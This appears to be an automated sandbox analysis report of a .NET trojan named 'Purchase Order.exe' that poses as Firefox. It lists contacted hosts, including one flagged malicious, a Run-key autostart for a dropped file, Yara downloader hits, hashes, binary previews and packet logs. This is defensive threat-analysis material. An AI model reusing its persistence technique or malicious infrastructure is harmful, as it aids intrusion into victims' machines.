                                                                          http://mail.pilotgarage.comMSBuild.exe, 00000011.00000002.509801704.0000000003357000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.fontbureau.com/designersGPurchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://fedir.comsign.co.il/crl/ComSignCA.crl0MSBuild.exe, 00000011.00000003.399413894.0000000006D45000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://www.fontbureau.com/designers/?Purchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0MSBuild.exe, 00000011.00000003.399208416.0000000006D28000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.399053031.0000000006D22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://web.ncdc.gov.sa/crl/nrcaparta1.crlMSBuild.exe, 00000011.00000003.399451261.0000000006D38000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.399030833.0000000006D35000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398231155.0000000006D2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.datev.de/zertifikat-policy-int0MSBuild.exe, 00000011.00000003.398106072.0000000006454000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398995729.0000000006D2C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398231155.0000000006D2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.founder.com.cn/cn/bThePurchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://www.fontbureau.com/designers?Purchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs
                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  162.159.130.233
                                                                                  unknownUnited States
                                                                                  13335CLOUDFLARENETUSfalse
                                                                                  162.159.129.233
                                                                                  cdn.discordapp.comUnited States
                                                                                  13335CLOUDFLARENETUSfalse
                                                                                  5.250.241.50
                                                                                  mail.pilotgarage.comTurkey
                                                                                  59674AYSIMATRtrue
                                                                                  IP
                                                                                  192.168.2.1
                                                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                  Analysis ID:618941
                                                                                  Start date and time: 02/05/202213:00:232022-05-02 13:00:23 +02:00
                                                                                  Joe Sandbox Product:CloudBasic
                                                                                  Overall analysis duration:0h 10m 14s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:light
                                                                                  Sample file name:Purchase Order.exe
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                  Number of analysed new started processes analysed:33
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • HDC enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Detection:MAL
                                                                                  Classification:mal100.spre.troj.spyw.evad.winEXE@22/5@5/4
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  HDC Information:
                                                                                  • Successful, ratio: 0.1% (good quality ratio 0.1%)
                                                                                  • Quality average: 47.3%
                                                                                  • Quality standard deviation: 33.8%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  • Number of executed functions: 0
                                                                                  • Number of non-executed functions: 0
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe
                                                                                  • Adjust boot time
                                                                                  • Enable AMSI
                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                  • TCP Packets have been reduced to 100
                                                                                  • Excluded IPs from analysis (whitelisted): 20.82.209.183, 23.211.6.115, 40.126.32.135, 20.190.160.23, 20.190.160.13, 40.126.32.132, 20.190.160.21, 20.190.160.15, 40.126.32.73, 40.126.32.137, 23.211.4.86, 20.82.210.154, 209.197.3.8, 173.222.108.226, 173.222.108.210, 80.67.82.211, 80.67.82.235, 52.242.101.226, 20.54.89.106, 52.251.79.25, 40.125.122.176, 52.152.110.14
                                                                                  • Excluded domains from analysis (whitelisted): www.tm.lg.prod.aadmsa.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, sls.update.microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net, login.msa.msidentity.co
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  TimeTypeDescription
                                                                                  13:02:31API Interceptor1x Sleep call for process: Purchase Order.exe modified
                                                                                  13:02:32AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Puizg "C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exe"
                                                                                  13:02:33API Interceptor358x Sleep call for process: MSBuild.exe modified
                                                                                  13:02:40AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Puizg "C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exe"
                                                                                  No context
                                                                                  No context
                                                                                  No context
                                                                                  No context
                                                                                  No context
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                  File Type:Microsoft Cabinet archive data, 61480 bytes, 1 file
                                                                                  Category:dropped
                                                                                  Size (bytes):61480
                                                                                  Entropy (8bit):7.9951219482618905
                                                                                  Encrypted:true
                                                                                  SSDEEP:1536:kmu7iDG/SCACih0/8uIGantJdjFpTE8lTeNjiXKGgUN:CeGf5gKsG4vdjFpjlYeX9gUN
                                                                                  MD5:B9F21D8DB36E88831E5352BB82C438B3
                                                                                  SHA1:4A3C330954F9F65A2F5FD7E55800E46CE228A3E2
                                                                                  SHA-256:998E0209690A48ED33B79AF30FC13851E3E3416BED97E3679B6030C10CAB361E
                                                                                  SHA-512:D4A2AC7C14227FBAF8B532398FB69053F0A0D913273F6917027C8CADBBA80113FDBEC20C2A7EB31B7BB57C99F9FDECCF8576BE5F39346D8B564FC72FB1699476
                                                                                  Malicious:false
                                                                                  Preview:MSCF....(.......,...................I........y.........Tbr .authroot.stl..$..4..CK..<Tk...c_.d....A.K.....Y.f....!.))$7*I.....e..eKT..k....n.3.......S..9.s.....3H.Mh......qV.=M6.=.4.F.....V:F..]......B`....Q...c"U.0.n....J.....4.....i7s..:.27....._...+).lE..he.4|.?,...h....7..PA..b.,. .....#1+..o...g.....2n1m...=.......Dp.;..f..ljX.Dx..r<'.1RI3B0<w.D.z..)D|..8<..c+..'XH..K,.Y..d.j.<.A.......l_lVb[w..rDp...'.....nL....!G.F....f.fX..r.. ?.....v(...L..<.\.Z..g;.>.0v...P ......|...A..(..x...T0.`g...c..7.U?...9.p..a..&..9......sV..l0..D..fhi..h.F....q...y.....Mq].4..Z.....={L....AS..9.....:.:.........+..P.N....EAQ.V. sr.....y.B.`.Efe..8../....$...y-.q.J.......nP...2.Q8...O........M.@\.>=X....V..z.4.=.@...ws.N.M3.S.c?.....C4]?..\.K.9......^...CU......O....X.`........._.gU...*..V.{V6..m..D.-|.Q.t.7.....9.~....[...I.<e...~$..>......s.I.S....~1..IV.2Ri:..]R!8...q...l.X.%.)@......2.gb,t...}..;...@.Z..<q..y..:...e3..cY.we.$....z..| .#.......I...
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                  File Type:data
                                                                                  Category:modified
                                                                                  Size (bytes):330
                                                                                  Entropy (8bit):3.1367431092306868
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:kK/ToJN+SkQlPlEGYRMY9z+4KlDA3RUesJ21:3zkPlE99SNxAhUesE1
                                                                                  MD5:D585AD266E57588F8B3EAB2046562E95
                                                                                  SHA1:F4CF9E5051AF30211DBB5C1D669FE7C01368566F
                                                                                  SHA-256:700758D0C23374A7551B98D052C45AF675AE2360329957DFC61AD854ADE2B893
                                                                                  SHA-512:825C61A4A4A01224B17D0C339602833B724969F5AF7F2E128F0F7A574045FC3BAA8EF13790F626100BDD752C0408E2EA2CFA9E9A9366DE70DD1D6F6CADD4A60F
                                                                                  Malicious:false
                                                                                  Preview:p...... .........MC..^..(....................................................... ........3k/"[......(...........(...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".8.0.3.3.6.b.2.f.2.2.5.b.d.8.1.:.0."...
                                                                                  Process:C:\Users\user\Desktop\Purchase Order.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:modified
                                                                                  Size (bytes):1119
                                                                                  Entropy (8bit):5.356708753875314
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzd
                                                                                  MD5:3197B1D4714B56F2A6AC9E83761739AE
                                                                                  SHA1:3B38010F0DF51C1D4D2C020138202DABB686741D
                                                                                  SHA-256:40586572180B85042FEFED9F367B43831C5D269751D9F3940BBC29B41E18E9F6
                                                                                  SHA-512:58EC975A53AD9B19B425F6C6843A94CC280F794D436BBF3D29D8B76CA1E8C2D8883B3E754F9D4F2C9E9387FE88825CCD9919369A5446B1AFF73EDBE07FA94D88
                                                                                  Malicious:true
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                  Process:C:\Users\user\Desktop\Purchase Order.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):44032
                                                                                  Entropy (8bit):5.491955566372164
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:FHYm+Nnx5Cb+XHJynH5rHmHfffffJQaulaipMwCKzH2S3dd0hUADkadcX:FHYmyDCCXHJASGlbMwCKN3deVDwX
                                                                                  MD5:D88A146F731E00B42947EC060F3D4F43
                                                                                  SHA1:46243E85F209FDB306AFFD5EEFB9FFE5FA3D2614
                                                                                  SHA-256:D08B7126B81C09BE7E54774CC35399FACEEF0C2D4732CBBCA5D46C48D89A2F51
                                                                                  SHA-512:5DC37BD378418B0787CE6D8C4A8D5E945850B0AE22D27FB1A6739463E3F97C2F1E8A9209EA7A48313A3F677E0110E18926BCB055732BA02238E6984E16125DF0
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exe, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exe, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 31%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s................0..$...........C... ...`....@.. ....................... ............@..................................B..O....`..............................B............................................... ............... ..H............text....#... ...$.................. ..`.rsrc.......`.......&..............@..@.reloc..............................@..B.................B......H........'..............L>..P...........................................^..}.....(.......(.....*..s......(.....s....r...p.(.....s....(.....*.0..+.........,..{.......+....,...{....o........(.....*..0..p.........(......"..0A"...As....(.......(...... ... ....s....(......r[..p(......r[..po ............s!...("......(#....*..{....*"..}....*..{....*"..}....*^..}.....(.......(.....*...0..T......... ....($.......&....(%......#......3@(&....+...(%....('.....-.s(....s)...(*....+..*....
                                                                                  Process:C:\Users\user\Desktop\Purchase Order.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):26
                                                                                  Entropy (8bit):3.95006375643621
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                  Malicious:false
                                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Entropy (8bit):5.491955566372164
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                  File name:Purchase Order.exe
                                                                                  File size:44032
                                                                                  MD5:d88a146f731e00b42947ec060f3d4f43
                                                                                  SHA1:46243e85f209fdb306affd5eefb9ffe5fa3d2614
                                                                                  SHA256:d08b7126b81c09be7e54774cc35399faceef0c2d4732cbbca5d46c48d89a2f51
                                                                                  SHA512:5dc37bd378418b0787ce6d8c4a8d5e945850b0ae22d27fb1a6739463e3f97c2f1e8a9209ea7a48313a3f677e0110e18926bcb055732ba02238e6984e16125df0
                                                                                  SSDEEP:384:FHYm+Nnx5Cb+XHJynH5rHmHfffffJQaulaipMwCKzH2S3dd0hUADkadcX:FHYmyDCCXHJASGlbMwCKN3deVDwX
                                                                                  TLSH:7D13D81A38969619C9D47BF869B0618266367CE50034C14FDCF97F2A9E73323DCC26AD
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s................0..$...........C... ...`....@.. ....................... ............@................................
                                                                                  Icon Hash:0f4d494919151b03
                                                                                  Entrypoint:0x40430a
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                  Time Stamp:0x911D7309 [Sun Feb 24 13:05:13 2047 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:v4.0.30319
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                  Instruction
                                                                                  jmp dword ptr [00402000h]
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x42b80x4f.text
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x83e4.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x100000xc.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x429c0x1c.text
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x20000x23100x2400False0.441189236111data5.43446618033IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                  .rsrc0x60000x83e40x8400False0.288293087121data5.21213109817IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc0x100000xc0x200False0.041015625data0.0776331623432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                  NameRVASizeTypeLanguageCountry
                                                                                  RT_ICON0x61600x468GLS_BINARY_LSB_FIRST
                                                                                  RT_ICON0x65d80x10a8data
                                                                                  RT_ICON0x76900x25a8data
                                                                                  RT_ICON0x9c480x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 0, next used block 0
                                                                                  RT_GROUP_ICON0xde800x3edata
                                                                                  RT_VERSION0xded00x312data
                                                                                  RT_MANIFEST0xe1f40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                  DLLImport
                                                                                  mscoree.dll_CorExeMain
                                                                                  DescriptionData
                                                                                  Translation0x0000 0x04b0
                                                                                  LegalCopyrightMozilla
                                                                                  Assembly Version18.5.0.0
                                                                                  InternalNameNqdkg.exe
                                                                                  FileVersion18.5.0.0
                                                                                  CompanyNameMozilla
                                                                                  LegalTrademarks
                                                                                  CommentsFirefox
                                                                                  ProductNameFirefox
                                                                                  ProductVersion18.5.0.0
                                                                                  FileDescriptionFirefox
                                                                                  OriginalFilenameNqdkg.exe
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  May 2, 2022 13:01:21.991503000 CEST49709443192.168.2.440.126.31.143
                                                                                  May 2, 2022 13:01:21.991692066 CEST49710443192.168.2.440.126.31.143
                                                                                  May 2, 2022 13:01:22.931256056 CEST49711443192.168.2.440.126.31.143
                                                                                  May 2, 2022 13:01:23.688009024 CEST49717443192.168.2.4204.79.197.200
                                                                                  May 2, 2022 13:01:23.688158989 CEST49717443192.168.2.4204.79.197.200
                                                                                  May 2, 2022 13:01:23.688246965 CEST49717443192.168.2.4204.79.197.200
                                                                                  May 2, 2022 13:01:23.688288927 CEST49717443192.168.2.4204.79.197.200
                                                                                  May 2, 2022 13:01:23.688328981 CEST49717443192.168.2.4204.79.197.200
                                                                                  May 2, 2022 13:01:23.688355923 CEST49717443192.168.2.4204.79.197.200
                                                                                  May 2, 2022 13:01:23.688375950 CEST49717443192.168.2.4204.79.197.200
                                                                                  May 2, 2022 13:01:23.688416004 CEST49717443192.168.2.4204.79.197.200
                                                                                  May 2, 2022 13:01:23.688431978 CEST49717443192.168.2.4204.79.197.200
                                                                                  May 2, 2022 13:01:23.688446999 CEST49717443192.168.2.4204.79.197.200
                                                                                  May 2, 2022 13:01:23.704385996 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.704508066 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.704540014 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.704565048 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.704591036 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.704636097 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.704689026 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.704718113 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.704744101 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.704854965 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.704884052 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.705015898 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.705051899 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.705075979 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.705101967 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.705127001 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.705152035 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.705223083 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.705250978 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.705276966 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.705353022 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.705378056 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.705404043 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.705430984 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.705491066 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.705518961 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.705545902 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.705625057 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.705652952 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.705738068 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.705763102 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.705789089 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.705898046 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.705926895 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.705951929 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.705977917 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.706007957 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.706033945 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.706078053 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.706124067 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.706132889 CEST49717443192.168.2.4204.79.197.200
